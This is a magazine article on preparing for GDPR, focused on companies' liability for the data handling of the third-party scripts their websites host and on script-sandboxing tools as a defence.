Preparing for GDPR: Pay Attention to Third Party Services

Data privacy died a long time ago: even big-data collectors that “anonymize” information know everything that they need in order to sell us goods and services in a very direct and targeted manner.

The new General Data Protection Regulation (GDPR) rules will ensure that companies ensure that data is safe, secure and under the control of the persons or organizations it belongs to. Unfortunately, many firms aren't ready for GDPR, and most don't even know what it's all about.

A June 2017 poll by Spiceworks found that only 9% of US firms were even aware of what the GDPR was all about, and how it will affect their company. As far as being ready for GDPR, only 2% of IT professionals in the US believe that their firm is fully prepared to meet the requirements, while only 5% have even begun preparing. In EU countries 28% said they were in the process of preparing, while only 2% were fully prepared.

Even those firms that are fully prepared are unlikely to be ready to meet perhaps the biggest GDPR challenge: how to ensure that the firms they partner with follow the rules, lest they suffer the consequences the regulations impose.

While many countries (in Europe and elsewhere) have in the past issued guidelines on promoting privacy and data security on the internet, GDPR is the first one to have actual teeth – as in sanctions, penalties, and fines for violators. Among the regulations GDPR imposes on data firms is enabling users to be in control of their data – giving them the right to move their accounts (and all its information) between different firms, or to have it erased altogether.

Companies that want to collect data must attain specific permission from users, and in addition, companies must institute strong security measures, appoint a data protection officer who will be in charge of policy, and inform users within 72 hours of a data breach so they can take steps to protect themselves (change passwords, etc.). Companies that fail to follow the rules could find themselves facing hefty fines – as much as 4% of total annual turnover, or 20 million euros (whichever is bigger).

Perhaps most significantly, the GDPR rules apply not only to companies located inside the EU, but to any firm anywhere that interacts with EU citizens. As a result, companies have been scrambling to prepare to comply with the GDPR, which come into effect in May 2018. In a world of data that has never really known borders before, the data companies are working hard to fit into the new paradigm the EU is imposing.

For customer-facing organizations like banks, publishers, insurance companies, etc., this could be a huge problem; according to GDPR rules, the buck (or the euro, in this case) stops with the site that the customer engages with directly – and if any of that site's partners violate GDPR rules, the direct-connect site is still to be considered responsible.

Thus, if a bank site uses a third-party service to run a connection to social media sites, the bank needs to make sure that the partner supplying that script is aware of, and observes, the GDPR rules; if it does not and data is lost, stolen, or shipped out of EU countries without permission of the customer who provided that data, the EU could slap the bank with a large fine.

The problem is a huge one: the internet as we know it is dependent on the use of these third-party scripts. From chat to ads to social media and beyond, many of the services websites use to do business today are not provided by them, but by third parties. The worst part is that firms have no way to easily ascertain if their partners are compliant; a bank's designated data protection officer won't know if it is safe and secure, or if there is a backdoor hackers can use to steal data – or even if the partner is observing GDPR rules by storing data in EU-based servers. The wages of ignorance in this case are likely to be sanctions – which, as we have seen, can be substantial.

How can companies defend themselves, and their bottom lines, under these circumstances? One possibility is to use commercially available dynamic protective layers for websites that could examine the activities of a script in a protected area. This is like a sandbox, but more sophisticated as sandboxes can report on what happens in the sandbox, not what sites the script connects with beyond the sandbox, in order to examine what the effects of a script are. The system “arrests” (halts and evaluates) the script in order to see what it does, before it is loaded onto a live page.

If the script seems to be trying to pull off an exploit – communicating with a server that does not appear associated with the purported service the script is supposed to be performing such as copying keystrokes or user information - the security system can prevent the script from executing on a web page, with the site ignoring its connections. The user and the site are protected from non-compliant or malicious scripts, eliminating the threat of GDPR sanctions.

Here then is a way for companies to prepare for what may be the biggest change in the way they are required to handle data, perhaps ever. In a way, the GDPR is providing an invaluable service for site administrators; chances are that many of them never considered that their trusted partners could jeopardize their cybersecurity.

With the new regulations, companies are going to have to look into exactly what the third-party scripts they host are actually doing - saving them from potential losses, lawsuits, and loss of reputation.

What’s Hot on Infosecurity Magazine?